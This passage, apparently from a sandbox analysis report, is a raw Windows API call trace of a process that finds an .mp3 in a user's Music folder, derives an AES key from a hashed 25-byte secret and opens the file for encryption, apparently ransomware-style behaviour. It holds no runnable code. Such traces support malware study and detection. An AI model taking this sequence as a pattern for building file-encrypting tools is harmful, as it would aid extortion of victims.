dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.288] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.288] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0188.288] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0188.288] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.288] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.288] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.288] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.288] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.288] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.288] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6b94ad0, ftCreationTime.dwHighDateTime=0x1d5deab, ftLastAccessTime.dwLowDateTime=0x17c989e0, ftLastAccessTime.dwHighDateTime=0x1d5da3a, ftLastWriteTime.dwLowDateTime=0x17c989e0, ftLastWriteTime.dwHighDateTime=0x1d5da3a, nFileSizeHigh=0x0, nFileSizeLow=0x4bb8, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="xhgr3.mp3", cAlternateFileName="")) returned 0x90af58 [0188.289] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0188.289] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.289] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.289] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.289] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.289] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0188.289] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.289] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0188.289] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.289] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.289] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0188.289] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.290] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.290] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.290] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.290] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.290] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0188.290] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.290] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0188.291] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.291] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.291] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0188.291] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.291] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.291] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.291] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.291] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.291] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.291] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.292] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.292] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.292] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.292] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.292] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.292] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0188.292] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.292] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.292] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.292] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.292] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.292] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.292] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.292] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.292] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.292] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.292] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.292] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.292] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.293] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.293] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.293] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.293] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.293] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.293] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.293] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0188.293] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.293] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.293] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.293] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.293] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0188.293] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.293] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.293] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.293] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.293] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.294] CryptHashData (hHash=0x90ae18, pbData=0x8dec18, dwDataLen=0x19, dwFlags=0x1) returned 1 [0188.294] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.294] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.294] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.294] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.294] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.294] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.294] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.294] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.294] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0188.294] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.295] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.295] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.295] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.295] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.295] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.295] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0188.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.295] CryptDestroyHash (hHash=0x90ae18) returned 1 [0188.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0188.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0188.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0188.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0188.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0188.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0188.295] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0188.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0188.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0188.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0188.296] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0188.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.296] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.296] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.296] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0188.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0188.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0188.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0188.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.296] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xhgr3.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0188.297] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.297] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0188.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0188.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0188.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0188.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0188.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0188.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0188.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.298] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0188.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0188.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0188.298] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0188.298] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0188.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0188.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0188.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0188.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0188.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0188.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0188.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0188.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0188.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0188.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0188.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0188.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0188.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0188.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0188.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0188.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0188.300] HeapFree (in: hHeap=0x8a0000, 